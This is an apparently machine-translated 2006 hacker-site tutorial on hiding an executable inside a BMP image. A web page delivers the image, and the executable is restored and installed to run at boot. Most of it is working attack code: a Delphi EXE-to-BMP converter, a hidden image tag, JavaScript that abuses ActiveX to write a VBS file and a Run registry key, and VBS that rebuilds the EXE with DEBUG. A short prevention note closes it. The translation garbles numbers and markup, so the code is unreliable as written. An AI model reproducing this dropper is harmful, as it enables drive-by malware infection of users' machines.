Use of pictures do Trojan applications completely resolution-vulnerability warning-the black bar safety net

ID MYHACK58:62200612864
Type myhack58
Reporter 佚名
Modified 2006-11-14T00:00:00


What is a BMP web page Trojan? It and last long with the stink of a MIME header vulnerability of Trojans different,MIME Trojans is to put an EXE file with a MIME-encoded as an EML(OUT LOOK mail)the file,put in on a web page using IE and OE coding vulnerability to automatically download and execute.

However BMP Trojan is different,it put an EXE file disguised as a BMP picture file,to deceive the IE to automatically download,re-use in web pages JAVASCRIPT script to find the client's temporary Internet folder,find the downloaded BMP file,copy it to a TEMP directory. Then write a script to find the BMP file to use the DEBUG restore into an EXE,and put it into the registry startup items,the next boot time to perform. However, this technique only works in 9X to play a role,for 2K,XP is powerless.

Looks as if very complicated,below we have a step-by-step to: 1) EXE change the BMP method. We check the BMP file information will know,the BMP file header is 5 4-byte,simple to say which contains a BMP file of the length and width,number of bits,file size,data length,as long as we in the EXE file header added before the corresponding BMP file header(of course, the BMP file header of the data to be consistent with the EXE file size anyway),so that you can trick IE to download the BMP file,start us with a JPG file done the test,find out if the file header is incorrect then IE is not downloaded,the conversion code is as follows:

program exe2bmp;

uses Windows, SysUtils;

var len,row,col,fs: DWORD; buffer: array[0..2 5 5]of char; fd: WIN32_FIND_DATA; h,hw: THandle;

begin if (ParamStr(1)<>’) and(ParamStr(2)<>’) then begin //if run after no two parameters then exit if FileExists(ParamStr(1)) then begin FindFirstFile(Pchar(ParamStr(1)),fd); fs:=fd. nFileSizeLow; col := 4; while true do begin if (fs mod 1 2)=0 then begin len:=fs; end else len:=fs+1 2-(fs mod 1 2); row := len div col div 3; if row>col then begin col:=col+4; end else Break; end; FillChar(buffer,2 5 6,0); {Look for the BMP file header data} Buffer[0]:=’B’;Buffer[1]:=’M’; PDWORD(@buffer[1 8])^:=col; PDWORD(@buffer[2 2])^:=row; PDWORD(@buffer[3 4])^:=len; PDWORD(@buffer[2])^:=len+5 is 4; PDWORD(@buffer[1 0])^:=5 4; PDWORD(@buffer[1 4])^:=4 0; PWORD(@buffer[2 6])^:=1; PWORD(@buffer[2 8])^:=2 4; {Write to file} hw:=CreateFile(Pchar(ParamStr(2)),GENERIC_WRITE,FILE_SHARE_READ or FILE_SHARE_WRITE,nil,CREATE_ALWAYS,0,0); h:=CreateFile(Pchar(ParamStr(1)),GENERIC_READ,FILE_SHARE_READ or FILE_SHARE_WRITE,nil,OPEN_EXISTING,0,0); WriteFile(hw,buffer,5 4,col,0); repeat ReadFile(h,buffer,2 5 6,col,0); WriteFile(hw,buffer,col,col,0); untilcol<>2 5 6; WriteFile(hw,buffer,len-fs,col,0); CloseHandle(h); CloseHandle(hw); end; end; end.

The above code in DELPHI4,5,6 compile ,you can get a exe2bmp. exe file. We open the MSDOS mode,input exe2bmp myexe.exe mybmp. bmp Return you can put the second parameter of the specified EXE file converted into BMP format. Next is to put the BMP picture is placed on a web page,if you open this picture,some found this BMP also flowers,colors and monotonous. So we put on the page the best with this format < IMG width=0 higth="0" srd="mybmp. bmp" > the

The following is placed on the page of the script document. write(’ ’); function docsave() { a=document. applets[0]; a. setCLSID(’{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}’); a. the createInstance(); wsh=a. The GetObject(); a. setCLSID(’{0D43FE01-F093-11CF-8 9 4 0-00A0C9054228}’); a. the createInstance(); fso=a. The GetObject(); var winsys=fso. GetSpecialFolder(1); var vbs=winsys+’\\s. vbs’; wsh. RegWrite (’HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\vbs’,’wscript ’+’"’+vbs+’" ’);

var st=fso. CreateTextFile(vbs,true); st. WriteLine(’Option Explicit’); st. WriteLine(’Dim FSO,WSH,CACHE,str’); st. WriteLine(’Set FSO = CreateObject("Scripting. FileSystemObject")’);

st. WriteLine(’Set WSH = CreateObject("WScript. Shell")’); st. WriteLine(’CACHE=wsh. RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\ShellFolders\\Cache")’); st. WriteLine(’wsh. RegDelete("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\vbs")’); st. WriteLine (’wsh. RegWrite "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\tmp","tmp.exe"’); st. WriteLine(’SearchBMPFile fso. GetFolder(CACHE),"mybmp[1]. bmp"’); st. WriteLine(’WScript. Quit()’); st. WriteLine(’Function SearchBMPFile(Folder,fname)’); st. WriteLine(’ Dim SubFolder,File,Lt,tmp,winsys’); st. WriteLine(’ str=FSO. GetParentFolderName(folder) & "\\" & folder. name & "\\" & fname’); st. WriteLine(’ if FSO. FileExists(str) then’); st. WriteLine(’ tmp=fso. GetSpecialFolder(2) & "\\"’); st. WriteLine(’ winsys=fso. GetSpecialFolder(1) & "\\"’); st. WriteLine(’ set File=FSO. GetFile(str)’); st. WriteLine(’ File. Copy(tmp &"tmp. dat")’); st. WriteLine(’ File. Delete’); st. WriteLine(’ set Lt=FSO. CreateTextFile(tmp &"tmp. in")’); st. WriteLine(’ Lt. WriteLine("rbx")’); st. WriteLine(’ Lt. WriteLine("0")’); st. WriteLine(’ Lt. WriteLine("rcx")’); st. WriteLine(’ Lt. WriteLine("1 0 0 0")’); st. WriteLine(’ Lt. WriteLine("w136")’);st. WriteLine(’ Lt. WriteLine("q")’); st. WriteLine(’ Lt. Close’); st. WriteLine(’ WSH. Run "command /c debug" & tmp & "tmp. dat <" & tmp & "tmp. in >" & tmp & "tmp. out",false,6’); st. WriteLine(’ On Error Resume Next ’); st. WriteLine(’ FSO. GetFile(tmp &"tmp. dat"). Copy(winsys & "tmp.exe")’); st. WriteLine(’ FSO. GetFile(tmp &"tmp. dat"). Delete’); st. WriteLine(’ FSO. GetFile(tmp &"tmp. in"). Delete’); st. WriteLine(’ FSO. GetFile(tmp &"tmp. out"). Delete’); st. WriteLine(’ end if’); st. WriteLine(’ If Folder. SubFolders. Count <> 0 Then’); st. WriteLine(’ For Each SubFolder In Folder. SubFolders’); st. WriteLine(’ SearchBMPFile SubFolder,fname’); st. WriteLine(’ Next’); st. WriteLine(’ End If’); st. WriteLine(’End Function’); st. Close(); } setTimeout(’docsave()’,1 0 0 0);

The script is saved as"js.js",in a web page insert:

The script is mainly in the local machine's SYSTEM directory to generate a“S. VBS”file, the script file will be in the next boot automatically run. Mainly used from the temporary directory to find the mybmp[1]. the bmp file. “S. VBS”file the main contents are as follows:

Option Explicit Dim FSO,WSH,CACHE,str Set FSO = CreateObject("Scripting. FileSystemObject") Set WSH = CreateObject("WScript. Shell") CACHE=wsh. RegRead("HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellFolders\Cache") wsh. RegDelete("HKCU\Software\Microsoft\Windows\CurrentVersion\Run\vbs") wsh. RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\tmp","tmp.exe" SearchBMPFile fso. GetFolder(CACHE),"mybmp[1]. bmp" WScript. Quit() Function SearchBMPFile(Folder,fname) Dim SubFolder,File,Lt,tmp,winsys ’From the temporary folder to find the target BMP picture str=FSO. GetParentFolderName(folder) & "\" & folder. name & "\" & fname if FSO. FileExists(str) then tmp=fso. GetSpecialFolder(2) & "\" winsys=fso. GetSpecialFolder(1) & "\" set File=FSO. GetFile(str) File. Copy(tmp &"tmp. dat") File. Delete ’To generate a DEBUG script set Lt=FSO. CreateTextFile(tmp &"tmp. in") Lt. WriteLine("rbx") Lt. WriteLine("0") Lt. WriteLine("rcx") ’The following line of 1 0 0 0 is hexadecimal, the shift back to decimal is 4 0 9 6(This number is your EXE file size) Lt. WriteLine("1 0 0 0") Lt. WriteLine("w136") Lt. WriteLine("q") Lt. Close WSH. Run "command /c debug" & tmp & "tmp. dat <" & tmp &"tmp. in>" & tmp & "tmp. out",false,6 On Error Resume Next FSO. GetFile(tmp &"tmp. dat"). Copy(winsys & "tmp.exe") FSO. GetFile(tmp &"tmp. dat"). Delete FSO. GetFile(tmp &"tmp. in"). Delete FSO. GetFile(tmp &"tmp. out"). Delete end if If Folder. SubFolders. Count <> 0 Then For Each SubFolder In Folder. SubFolders SearchBMPFile SubFolder,fname Next End If End Function

This script will find in the temporary folder of bmp files,and generates a DEBUG script,run automatically from BMP file 5 4 byte read to you specify the size of the data,and save it to tmp. dat. Behind the script and then copy it to SYSTEM directory. This is to restore the EXE file the next time it re-starting when run. This is the BMP Trojan the basic realization of the process. The detailed script code, please refer to http://hotsky. 3 6 3. net

Prevention methods: The most simple,delete or rename the wscrpit. exe file and DEBUG file; Install effective anti-virus software,because these scripts have a lot of antivirus software can be found here. In the conditions allow,install WIN2K SP3,try to avoid to go to some no name origin websites.